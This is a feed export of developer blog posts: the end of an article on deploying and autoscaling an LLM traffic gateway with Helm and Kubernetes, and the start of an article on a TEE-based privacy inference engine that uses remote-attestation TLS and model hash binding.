&lt;p&gt;middlewares "rate-limit" {&lt;br&gt;
    type  = "rate-limit"&lt;br&gt;
    rate  = 60&lt;br&gt;
    burst = 10&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;middlewares "circuit-breaker" {&lt;br&gt;
    type              = "circuit-breaker"&lt;br&gt;
    failure_threshold = 3&lt;br&gt;
    cooldown_secs     = 30&lt;br&gt;
    success_threshold = 2&lt;br&gt;
  }&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Deploy:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
bash&lt;/p&gt;
&lt;h1&gt;
  
  
  Clone the repo (or find the chart path after brew install)
&lt;/h1&gt;

&lt;p&gt;git clone &lt;a href="https://github.com/A3S-Lab/Gateway.git" rel="noopener noreferrer"&gt;https://github.com/A3S-Lab/Gateway.git&lt;/a&gt;&lt;br&gt;
cd Gateway&lt;/p&gt;
&lt;h1&gt;
  
  
  Install
&lt;/h1&gt;

&lt;p&gt;helm install llm-gateway deploy/helm/a3s-gateway   -f values-prod.yaml   --namespace ai   --create-namespace   --set-string "extraEnv[0].name=JWT_SECRET"   --set-string "extraEnv[0].valueFrom.secretKeyRef.name=llm-secrets"   --set-string "extraEnv[0].valueFrom.secretKeyRef.key=jwt-secret"&lt;/p&gt;
&lt;h1&gt;
  
  
  Upgrade config (hot reload, no Pod restart)
&lt;/h1&gt;

&lt;p&gt;helm upgrade llm-gateway deploy/helm/a3s-gateway   -f values-prod.yaml   --namespace ai&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Verify:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
bash&lt;/p&gt;
&lt;h1&gt;
  
  
  Check gateway Pod status
&lt;/h1&gt;

&lt;p&gt;kubectl get pods -n ai&lt;/p&gt;
&lt;h1&gt;
  
  
  Check dashboard
&lt;/h1&gt;

&lt;p&gt;kubectl port-forward -n ai svc/llm-gateway 9090:8080&lt;br&gt;
curl &lt;a href="http://localhost:9090/api/gateway/health" rel="noopener noreferrer"&gt;http://localhost:9090/api/gateway/health&lt;/a&gt;    # health status&lt;br&gt;
curl &lt;a href="http://localhost:9090/api/gateway/routes" rel="noopener noreferrer"&gt;http://localhost:9090/api/gateway/routes&lt;/a&gt;    # current routing table&lt;br&gt;
curl &lt;a href="http://localhost:9090/api/gateway/metrics" rel="noopener noreferrer"&gt;http://localhost:9090/api/gateway/metrics&lt;/a&gt;   # Prometheus metrics&lt;/p&gt;
&lt;h1&gt;
  
  
  Test streaming inference (should see tokens arriving one by one immediately)
&lt;/h1&gt;

&lt;p&gt;curl -N &lt;a href="http://localhost:9090/v1/chat/completions" rel="noopener noreferrer"&gt;http://localhost:9090/v1/chat/completions&lt;/a&gt;   -H "Authorization: Bearer $JWT_TOKEN"   -H "Content-Type: application/json"   -d '{model:llama3,messages:[{role:user,content:Hello}],stream:true}'&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
---

## 11. Autoscaling: The Principles Behind the Numbers

The Knative autoscaling formula looks simple, but each parameter has a concrete physical meaning. Understanding these meanings is what lets you set the right parameters in real-world scenarios.

### The Formula

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;desired_replicas = ceil( (in_flight + queue_depth) / (container_concurrency x target_utilization) )&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
| Variable | Meaning |
|----------|---------|
|  | Total number of requests currently being processed across all instances |
|  | Number of requests waiting to be assigned to an instance (cold-start buffer queue) |
|  | Maximum number of requests an instance is allowed to handle simultaneously |
|  | Target utilization (0 to 1), reserving headroom for traffic spikes |

 is the most critical parameter — it must be set based on your model and hardware, not guessed. A rule of thumb:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;container_concurrency ≈ GPU memory / peak memory per request&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
For example: a GPU with 24 GB of memory, running a 7B Q4 model (about 5 GB), with peak KV-cache per request of about 2 GB:
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;container_concurrency ≈ (24 - 5) / 2 ≈ 9&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Setting it to 8 is conservative (leaving headroom for system overhead).

### Three Scenarios Walked Through

**Scenario 1: Idle → First Request Arrives (Cold Start)**

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Initial state: replicas = 0, in_flight = 0, queue_depth = 0&lt;br&gt;
              desired = ceil(0 / (8 x 0.7)) = 0 ✓&lt;/p&gt;

&lt;p&gt;t=0s:  First request arrives&lt;br&gt;
       replicas = 0, in_flight = 0, queue_depth = 1&lt;br&gt;
       desired = ceil(1 / 5.6) = ceil(0.18) = 1&lt;br&gt;
       → Scale-up triggered: start 1 instance, request enters buffer queue&lt;/p&gt;

&lt;p&gt;t=45s: Instance passes health check, replicas = 1&lt;br&gt;
       Request dequeued → sent to instance&lt;br&gt;
       User receives first token&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
The user waited 45 seconds and saw a normal inference response, not an error.

**Scenario 2: Traffic Spike (Scale-Up Needed)**

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Current state: replicas = 1, container_concurrency = 8, target_utilization = 0.7&lt;br&gt;
              effective capacity = 8 x 0.7 = 5.6 (scale-up triggers when requests exceed 6)&lt;/p&gt;

&lt;p&gt;Spike to 20 concurrent requests:&lt;br&gt;
  in_flight = 8 (current instance is full)&lt;br&gt;
  queue_depth = 12 (waiting to be assigned)&lt;br&gt;
  desired = ceil((8 + 12) / 5.6) = ceil(20 / 5.6) = ceil(3.57) = 4&lt;/p&gt;

&lt;p&gt;→ Scale from 1 instance to 4&lt;br&gt;
→ 4 instances effective capacity = 4 x 5.6 = 22.4, can handle 20 concurrent requests&lt;br&gt;
→ The 12 waiting requests are sent in order once new instances are ready (about 45s)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Note:  reserves 30% headroom, meaning scale-up begins when instances reach 70% utilization, not 100%. This is key for handling LLM inference latency — if you wait until instances are full before scaling, all new requests queue during the time it takes new instances to start.

**Scenario 3: Traffic Drops (Scale to Zero)**

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Peak ends: replicas = 4, in_flight = 2, queue_depth = 0&lt;br&gt;
  desired = ceil(2 / 5.6) = ceil(0.36) = 1&lt;br&gt;
  → Scale-down signal: target 1 instance&lt;/p&gt;

&lt;p&gt;But scale-down has a cooldown period:&lt;br&gt;
  The gateway observes for 60 seconds (configurable), confirms traffic has truly dropped, then executes scale-down&lt;br&gt;
  → Avoids thrashing (repeated scale-up/down) from brief traffic fluctuations&lt;/p&gt;

&lt;p&gt;5 minutes later: in_flight = 0, queue_depth = 0&lt;br&gt;
  desired = 0&lt;br&gt;
  → Scale to zero, GPU instance shuts down&lt;br&gt;
  → Cost savings until the next request arrives&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;


### Tuning Recommendations

| Parameter | Conservative | Aggressive | Use Case |
|-----------|-------------|------------|----------|
| `container_concurrency` | 50% of GPU memory capacity | 80% of GPU memory capacity | Conservative: stability first; Aggressive: cost first |
| `target_utilization` | 0.6 | 0.8 | Conservative: handle traffic spikes; Aggressive: latency tolerance is low priority |
| `min_replicas` | 1 (keep one warm instance) | 0 (allow cold start) | Conservative: cost vs latency-sensitive workloads; Aggressive: offline / low-frequency workloads |
| `max_replicas` | Number of GPUs | Number of GPUs x 2 (overcommit) | Depends on budget ceiling |

A common mistake is setting `target_utilization` to 1.0 — trying to fully utilize every instance's memory. The problem is that when utilization hits 100%, scale-up only then begins, and GPU instances take 30–60 seconds to start. During that window, all new requests wait. `0.7` means scale-up begins when instances still have 30% headroom, so new instances are ready before old ones are fully saturated.

---

The core challenge of AI infrastructure is not the model itself — it is the pipes that connect the model to the real world. The traffic layer is the most foundational of those pipes, and the most easily overlooked.

Using tools designed for the Web era to carry AI services is like using water pipes to transport natural gas: it might run in the short term, but every assumption is accumulating risk.

Redesigning the traffic layer from the actual requirements of AI services is an unavoidable step in modernizing AI infrastructure.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>gateway</category>
      <category>ai</category>
      <category>llm</category>
      <category>autoscaling</category>
    </item>
    <item>
      <title>A Privacy LLM Inference Engine That Runs on $10 Hardware</title>
      <dc:creator>Roy Lin</dc:creator>
      <pubDate>Mon, 23 Feb 2026 18:28:47 +0000</pubDate>
      <link>https://forem.com/roylin/a-privacy-llm-inference-engine-that-runs-on-10-hardware-3i6h</link>
      <guid>https://forem.com/roylin/a-privacy-llm-inference-engine-that-runs-on-10-hardware-3i6h</guid>
      <description>&lt;p&gt;Three facts define the problem A3S Power was built to solve:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;One:&lt;/strong&gt; Every prompt you send to any LLM inference server exists in plaintext in server memory. Ollama, vLLM, TGI, llama.cpp — no exceptions. Operators promise they "won't look," but that's policy, not physics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Two:&lt;/strong&gt; A quantized 10B-parameter model requires 6GB of memory. TEE (Trusted Execution Environment) encrypted memory is typically only 256MB. Traditional inference engines under this constraint can only run 0.5B toy models — incapable of any real security decision-making.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Three:&lt;/strong&gt; A $10 piece of hardware with 256MB of memory can run a 10B model through layer-streaming inference. That model is powerful enough to do three critical things inside hardware-encrypted memory: &lt;strong&gt;security validation&lt;/strong&gt; (detecting prompt injection), &lt;strong&gt;intelligent data redaction&lt;/strong&gt; (distinguishing sensitive from public information), and &lt;strong&gt;sensitive tool call approval&lt;/strong&gt; (determining whether an Agent's actions exceed authorization).&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The intersection of these three facts is the question A3S Power tries to answer: &lt;strong&gt;Can we use hardware encryption to protect every prompt on $10 hardware, while running a model smart enough to make security decisions?&lt;/strong&gt; Our answer is yes.&lt;/p&gt;

&lt;p&gt;This article follows a real prompt — a client portfolio analysis request sent by an investment bank trader — through its complete journey inside A3S Power. At each security layer, we stop and look at what was done, why it was done, and what the code looks like.&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Your Prompt Is Running Naked in Server Memory&lt;/li&gt;
&lt;li&gt;Gate One: A Hardware Attestation Hidden Inside the TLS Handshake&lt;/li&gt;
&lt;li&gt;Gate Two: Hardware Locks Memory in a Safe&lt;/li&gt;
&lt;li&gt;How Do You Know Which Model the Server Is Running?&lt;/li&gt;
&lt;li&gt;Running a 10B Model in 256MB — The Secret of picolm Layer-Streaming Inference&lt;/li&gt;
&lt;li&gt;Logs, Error Messages, Token Counts — Every One Can Betray You&lt;/li&gt;
&lt;li&gt;Model Weights Are Also Confidential: Three Encrypted Loading Modes&lt;/li&gt;
&lt;li&gt;How Can the Client Verify All of This Itself?&lt;/li&gt;
&lt;li&gt;Six-Layer Architecture: What's Inside&lt;/li&gt;
&lt;li&gt;Why Pure Rust? The Trust Ledger of Supply Chain Auditing&lt;/li&gt;
&lt;li&gt;Compared to Ollama, vLLM, TGI — Where's the Gap?&lt;/li&gt;
&lt;li&gt;If You Need to Deploy Today&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  1. Your Prompt Is Running Naked in Server Memory
&lt;/h2&gt;

&lt;p&gt;First, let's look at what that prompt looks like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Client [Name], account ending in 8832, holds 500,000 shares of AAPL at a cost basis of $142.7, with a current unrealized gain of $120M. Please analyze hedging strategies under Fed rate hike expectations and assess the market impact of a large block sale."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This prompt travels through an HTTPS tunnel to the inference server. TLS terminates. From this moment on, the client's name, account information, position size, and trading strategy — all of it lies in plaintext in server memory.&lt;/p&gt;

&lt;p&gt;A prompt goes through five stages inside an inference server:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Network transit&lt;/strong&gt;: Protected by HTTPS, no problem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory decryption&lt;/strong&gt;: TLS terminates, prompt becomes plaintext — the problem starts here&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Inference computation&lt;/strong&gt;: tokenize → matrix operations → generate response, all in plaintext&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Log recording&lt;/strong&gt;: prompt and response may be written to log files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory residue&lt;/strong&gt;: the request is done, but the data still sits in memory waiting to be overwritten&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Disk encryption protects data at rest. TLS protects data in transit. But who protects &lt;strong&gt;data being processed&lt;/strong&gt;? Nobody.&lt;/p&gt;

&lt;p&gt;This isn't a theoretical risk:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Finance (SOX/GLBA)&lt;/strong&gt; — Leaked trading strategies and client positions mean insider trading or market manipulation. Regulators want auditable technical guarantees, not verbal promises&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Healthcare (HIPAA)&lt;/strong&gt; — Cloud provider administrators can theoretically read all patient data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Government and Defense&lt;/strong&gt; — Classified information has strict physical isolation requirements; traditional inference servers cannot prove data wasn't leaked&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-tenant AI platforms&lt;/strong&gt; — A single memory boundary vulnerability can break tenant isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The trust model of traditional solutions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;You trust → Cloud provider → won't read your memory
You trust → Inference server operator → won't log your prompt
You trust → System administrators → won't export memory snapshots
You trust → Everyone with physical access → won't perform cold boot attacks
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every layer of trust is an assumption. More assumptions means a more fragile system.&lt;/p&gt;

&lt;p&gt;A3S Power's answer: &lt;strong&gt;Replace trust assumptions with cryptographic verification, replace policy promises with hardware enforcement.&lt;/strong&gt; And this protection doesn't require expensive infrastructure — a $10 piece of hardware with 256MB of memory can run it.&lt;/p&gt;

&lt;p&gt;Now let that prompt continue its journey.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Gate One: A Hardware Attestation Hidden Inside the TLS Handshake
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: There's a Time Gap Between Verification and Communication
&lt;/h3&gt;

&lt;p&gt;Traditional remote attestation schemes split attestation and communication into two steps: first verify the server's identity, then establish a TLS connection to send data. Sounds reasonable?&lt;/p&gt;

&lt;p&gt;It's not. There's a time window between these two steps — a TOCTOU (Time-of-Check-Time-of-Use) vulnerability. You verified server A, but in the instant you establish the connection, an attacker may have already swapped A for B. Your prompt was sent to a server you never verified.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: RA-TLS
&lt;/h3&gt;

&lt;p&gt;RA-TLS (Remote Attestation TLS) embeds the attestation report directly into the X.509 extension fields of the TLS certificate. Remote attestation completes simultaneously with the TLS handshake — no time window, no TOCTOU.&lt;/p&gt;

&lt;p&gt;First, the config — three lines:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;tee_mode&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;tls_port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11443&lt;/span&gt;
&lt;span class="nx"&gt;ra_tls&lt;/span&gt;   &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A3S Power's RA-TLS implementation details:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Self-signed ECDSA P-256 certificate&lt;/strong&gt;: A new certificate is generated each time the server starts, valid for 365 days&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom X.509 extension&lt;/strong&gt;: OID &lt;code&gt;1.3.6.1.4.1.56560.1.1&lt;/code&gt;, containing a JSON-encoded attestation report&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SAN (Subject Alternative Names)&lt;/strong&gt;: Always includes localhost + 127.0.0.1 + ::1, with support for additional DNS names or IP addresses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the client for that trading analysis prompt initiates a TLS connection, it can extract the OID &lt;code&gt;1.3.6.1.4.1.56560.1.1&lt;/code&gt; extension from the certificate, parse the JSON attestation report, and verify it with the Verify SDK. The entire process completes during the handshake — verification fails? The connection terminates immediately, and not a single byte of the prompt is sent.&lt;/p&gt;

&lt;h3&gt;
  
  
  There's Also a More Hidden Channel: Vsock
&lt;/h3&gt;

&lt;p&gt;When A3S Power runs inside an a3s-box MicroVM, it doesn't use TCP/IP — it communicates with the host via Vsock (Virtio Socket):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Zero configuration&lt;/strong&gt;: No IP addresses, routing tables, or firewall rules needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure&lt;/strong&gt;: The communication channel doesn't go through the network stack; network-layer attackers can't intercept it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High performance&lt;/strong&gt;: virtio-based shared memory transport with extremely low latency&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Power uses the same axum router to handle both Vsock and TCP requests — all middleware (rate limiting, authentication, auditing) applies equally to Vsock.&lt;/p&gt;

&lt;p&gt;The TLS handshake is complete. That prompt has now entered the server. Next it will discover that the memory space it's in is completely different from a normal server.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Gate Two: Hardware Locks Memory in a Safe
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Software Isolation Isn't Hard Enough
&lt;/h3&gt;

&lt;p&gt;The OS's memory protection is at the software level. A kernel vulnerability, a privilege escalation, a malicious hypervisor — all can bypass it. In cloud environments, your virtual machine runs on someone else's physical machine, and the hypervisor has the right to read all your memory.&lt;/p&gt;

&lt;p&gt;This isn't a question of trust — it's a fundamental architectural flaw.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: TEE Hardware Isolation
&lt;/h3&gt;

&lt;p&gt;TEE (Trusted Execution Environment) creates an encrypted execution environment at the processor level:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory encryption&lt;/strong&gt;: All memory data is encrypted by hardware AES keys, managed by the processor's secure processor (PSP/SGX), inaccessible to the OS and VMM&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrity protection&lt;/strong&gt;: Hardware prevents external entities from tampering with memory contents inside the TEE&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote attestation&lt;/strong&gt;: The TEE can generate hardware-signed attestation reports proving its identity and the integrity of its runtime environment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Current mainstream TEE technologies:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Isolation Granularity&lt;/th&gt;
&lt;th&gt;Memory Encryption&lt;/th&gt;
&lt;th&gt;Attestation Mechanism&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AMD SEV-SNP&lt;/td&gt;
&lt;td&gt;AMD&lt;/td&gt;
&lt;td&gt;VM-level&lt;/td&gt;
&lt;td&gt;AES-128/256&lt;/td&gt;
&lt;td&gt;SNP_GET_REPORT ioctl&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel TDX&lt;/td&gt;
&lt;td&gt;Intel&lt;/td&gt;
&lt;td&gt;VM-level&lt;/td&gt;
&lt;td&gt;AES-128&lt;/td&gt;
&lt;td&gt;TDX_CMD_GET_REPORT0 ioctl&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Intel SGX&lt;/td&gt;
&lt;td&gt;Intel&lt;/td&gt;
&lt;td&gt;Process-level&lt;/td&gt;
&lt;td&gt;AES-128&lt;/td&gt;
&lt;td&gt;EREPORT/EGETKEY&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A3S Power supports AMD SEV-SNP and Intel TDX, and provides a simulation mode for development and testing.&lt;/p&gt;

&lt;h3&gt;
  
  
  Auto-Detection, Zero Configuration
&lt;/h3&gt;

&lt;p&gt;A3S Power automatically detects the TEE environment at startup — no manual specification needed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Check for &lt;code&gt;/dev/sev-guest&lt;/code&gt; device file → AMD SEV-SNP&lt;/li&gt;
&lt;li&gt;Check for &lt;code&gt;/dev/tdx-guest&lt;/code&gt; or &lt;code&gt;/dev/tdx_guest&lt;/code&gt; device file → Intel TDX&lt;/li&gt;
&lt;li&gt;Check for &lt;code&gt;A3S_TEE_SIMULATE=1&lt;/code&gt; environment variable → Simulation mode&lt;/li&gt;
&lt;li&gt;None of the above → No TEE&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The same binary runs in both TEE and non-TEE environments — TEE environments automatically enable hardware protection, development environments use simulation mode for testing.&lt;/p&gt;

&lt;h3&gt;
  
  
  TEE Is Not a Feature, It's a Cross-Cutting Concern
&lt;/h3&gt;

&lt;p&gt;Many people think TEE support just means adding an attestation endpoint. It's not. In A3S Power, TEE security permeates every layer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Layer           TEE Integration
──────────────  ──────────────────────────────────────────────────────
API             Log redaction, buffer zeroing, token count fuzzing, timing padding,
                attestation endpoint (nonce + model binding)

Server          Encrypted audit logs (AES-256-GCM), constant-time auth,
                RAII decrypted model storage, RA-TLS cert (X.509 attestation ext),
                TEE-specific Prometheus counters

Backend         EPC-aware routing (auto-switch to picolm when model &amp;gt; 75% EPC),
                per-request KV cache isolation, mlock weight pinning

Model           SHA-256 content-addressed storage, GGUF memory estimation (EPC budget planning)

TEE             Attestation (SEV-SNP/TDX ioctl), AES-256-GCM encryption (3 modes),
                Ed25519 model signing, key rotation, policy enforcement, log redaction (10 keys),
                SensitiveString (auto-zeroing), EPC memory detection

Verify          Client: nonce binding, model hash binding, measurement checks (all constant-time),
                hardware signature verification (AMD KDS / Intel PCS certificate chain)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That prompt is now safely resting in hardware-encrypted memory. But a new problem has emerged — how do you know the model processing this prompt is really the one you think it is?&lt;/p&gt;




&lt;h2&gt;
  
  
  4. How Do You Know Which Model the Server Is Running?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Model Identity Is a Black Box
&lt;/h3&gt;

&lt;p&gt;You send a request to an endpoint claiming to run "llama-3.2-3b." But how do you verify it? The operator might:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Replace the claimed model with a smaller, cheaper one (to save money)&lt;/li&gt;
&lt;li&gt;Replace the original model with a backdoored one (to steal data)&lt;/li&gt;
&lt;li&gt;Replace the original model with a fine-tuned one (to manipulate output)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;API behavior might look completely normal — you can't reliably distinguish different models from their output.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: Two-Layer Model Integrity + Hardware Attestation Binding
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Layer one: SHA-256 hash verification.&lt;/strong&gt; When &lt;code&gt;tee_mode = true&lt;/code&gt;, each model file's hash is verified at startup. No match? Refuse to start.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;tee_mode&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;model_hashes&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="s2"&gt;"llama3.2:3b"&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"sha256:a1b2c3d4e5f6..."&lt;/span&gt;
  &lt;span class="s2"&gt;"qwen2.5:7b"&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"sha256:def456789abc..."&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Layer two: Ed25519 signature verification.&lt;/strong&gt; The model publisher signs the model file with an Ed25519 private key; the signature is stored at &lt;code&gt;&amp;lt;model_path&amp;gt;.sig&lt;/code&gt; (64-byte raw signature). Verification happens at load time — confirming not only that the model hasn't been tampered with, but also that it genuinely came from the claimed publisher.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;model_signing_key&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"a1b2c3d4..."&lt;/span&gt;  &lt;span class="c1"&gt;# Ed25519 public key (hex-encoded, 32 bytes)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But these two layers only solve the server-side problem. How does the client know the server actually did these verifications?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The answer: model attestation binding.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When the client requests &lt;code&gt;GET /v1/attestation?nonce=&amp;lt;hex&amp;gt;&amp;amp;model=&amp;lt;name&amp;gt;&lt;/code&gt;, A3S Power embeds the model's SHA-256 hash into the &lt;code&gt;report_data&lt;/code&gt; field of the hardware attestation report:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client sends GET /v1/attestation?nonce=&amp;lt;hex&amp;gt;&amp;amp;model=&amp;lt;name&amp;gt;
    │
    ▼
Build report_data (64 bytes)
    ├── [0..32]  = nonce (client-provided, prevents replay)
    └── [32..64] = SHA-256(model_file) (model hash, proves model identity)
    │
    ▼
Call hardware ioctl
    ├── AMD: SNP_GET_REPORT → /dev/sev-guest
    │   Report offset 0x50: report_data (64 bytes)
    │   Report offset 0x90: measurement (48 bytes, SHA-384)
    │   Report offset 0x1A0: chip_id (64 bytes)
    │
    └── Intel: TDX_CMD_GET_REPORT0 → /dev/tdx-guest
        TDREPORT offset 64: reportdata (64 bytes)
        TDREPORT offset 528: MRTD (48 bytes)
    │
    ▼
Return AttestationReport {
    tee_type: "sev-snp" | "tdx" | "simulated",
    report_data: [u8; 64],      // nonce + model_hash
    measurement: [u8; 48],      // platform boot measurement
    raw_report: Vec&amp;lt;u8&amp;gt;,        // full firmware report (for independent client verification)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key is the layout of &lt;code&gt;report_data&lt;/code&gt;: &lt;code&gt;[nonce(32)][model_sha256(32)]&lt;/code&gt;. These 64 bytes are protected by hardware signatures, meaning:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Nonce binding&lt;/strong&gt;: A different nonce each time prevents replay of old attestation reports&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Model binding&lt;/strong&gt;: The model's SHA-256 hash is locked by hardware signature. Swap the model? The attestation immediately becomes invalid&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The client verifies three things to confirm model identity:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The attestation report is genuinely signed by TEE hardware (via AMD KDS / Intel PCS certificate chain)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;report_data[32..64]&lt;/code&gt; equals the expected model SHA-256 hash&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;report_data[0..32]&lt;/code&gt; equals the nonce the client sent&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Three steps form a complete chain of trust: &lt;strong&gt;hardware attestation → platform integrity → model identity → request freshness&lt;/strong&gt;.&lt;/p&gt;

